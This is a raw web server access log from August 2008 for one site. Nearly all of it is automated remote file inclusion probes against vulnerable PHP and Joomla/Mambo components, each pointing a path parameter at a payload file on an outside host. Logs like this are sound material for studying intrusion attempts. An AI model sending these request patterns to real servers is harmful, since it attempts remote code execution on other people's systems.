74.202.49.162 - - [24/Aug/2008:10:39:14 -0700] "GET /logs/access_080323.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [24/Aug/2008:10:39:29 -0700] "GET /logs//admin/classes/errors.php?error=http://xwarezx.secretivens.com/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [24/Aug/2008:10:39:31 -0700] "GET //admin/classes/errors.php?error=http://xwarezx.secretivens.com/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:10:39:38 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:39:59 -0700] "GET /logs/phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:39:59 -0700] "GET /phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:40:00 -0700] "GET /logs/access_080228.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:40:01 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:40:01 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.9 - - [24/Aug/2008:10:40:09 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [24/Aug/2008:10:40:20 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:40:21 -0700] "GET /logs/index2.php?x=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:40:21 -0700] "GET /index2.php?x=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.88 - - [24/Aug/2008:10:40:47 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:40:47 -0700] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:40:47 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:40:47 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:40:49 -0700] "GET /logs/access_080625.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:40:51 -0700] "GET /logs/access_080803.log///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:40:51 -0700] "GET ///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:40:51 -0700] "GET /logs/access_080803.log///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:40:51 -0700] "GET /logs///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:40:51 -0700] "GET ///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:40:51 -0700] "GET /logs///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:41:04 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.212.130.16 - - [24/Aug/2008:10:41:05 -0700] "GET /errors.php?error=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
62.212.130.16 - - [24/Aug/2008:10:41:05 -0700] "GET /logs/errors.php?error=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:41:10 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:41:10 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:41:18 -0700] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:41:19 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:41:20 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:41:21 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:41:21 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:41:21 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:41:40 -0700] "GET /logs/access_080811.log/phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:41:40 -0700] "GET /phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:41:41 -0700] "GET /logs/phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:41:55 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:41:55 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.117 - - [24/Aug/2008:10:41:57 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
203.22.204.117 - - [24/Aug/2008:10:41:57 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
203.22.204.117 - - [24/Aug/2008:10:41:57 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
66.135.41.76 - - [24/Aug/2008:10:41:58 -0700] "GET //multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [24/Aug/2008:10:41:58 -0700] "GET /logs/access_080211.log//multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [24/Aug/2008:10:41:58 -0700] "GET /logs//multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:42:03 -0700] "GET /logs/access_080811.log/phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:42:03 -0700] "GET /phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:42:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.68.17 - - [24/Aug/2008:10:42:26 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.232.68.17 - - [24/Aug/2008:10:42:26 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.232.68.17 - - [24/Aug/2008:10:42:26 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.53.133.106 - - [24/Aug/2008:10:42:36 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.53.133.106 - - [24/Aug/2008:10:42:37 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.41.76 - - [24/Aug/2008:10:42:45 -0700] "GET /logs/access_080312.log//multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:42:57 -0700] "GET /logs/access_080621.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:43:10 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:43:11 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:43:11 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:43:14 -0700] "GET /logs/access_080312.log/al_initialize.php?alpath=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:43:14 -0700] "GET /logs/al_initialize.php?alpath=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:43:15 -0700] "GET /logs/access_080228.log/al_initialize.php?alpath=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:43:17 -0700] "GET /al_initialize.php?alpath=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.98.67.106 - - [24/Aug/2008:10:43:24 -0700] "GET /logs/access_080211.log//multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [24/Aug/2008:10:43:24 -0700] "GET //multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [24/Aug/2008:10:43:25 -0700] "GET /logs//multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:43:41 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:43:42 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:43:46 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:43:46 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:43:54 -0700] "GET /logs//multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:43:54 -0700] "GET /logs/access_080211.log//multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:43:54 -0700] "GET //multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:00 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:00 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:10:44:12 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
65.98.67.106 - - [24/Aug/2008:10:44:14 -0700] "GET /logs/access_080312.log//multithumb/multithumb.php?mosConfig_absolute_path=http://www.orangephoto.eu/main/plugins/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.232.68.17 - - [24/Aug/2008:10:44:15 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:33 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:33 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:34 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:44:38 -0700] "GET /logs/access_080113.log/admin.php?rd=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:44:38 -0700] "GET /admin.php?rd=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:44:39 -0700] "GET /logs/admin.php?rd=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:44:41 -0700] "GET /logs/index2.php?x=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:44:41 -0700] "GET /index2.php?x=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:42 -0700] "GET /logs/phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:42 -0700] "GET /phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:42 -0700] "GET /logs/access_080811.log/phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:44:51 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:44:51 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:44:51 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:52 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:44:52 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:45:12 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:45:12 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:45:29 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:45:30 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:45:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.117 - - [24/Aug/2008:10:45:33 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
203.22.204.117 - - [24/Aug/2008:10:45:33 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
203.22.204.117 - - [24/Aug/2008:10:45:33 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
203.22.204.117 - - [24/Aug/2008:10:45:33 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:45:45 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:45:45 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:45:47 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:45:47 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
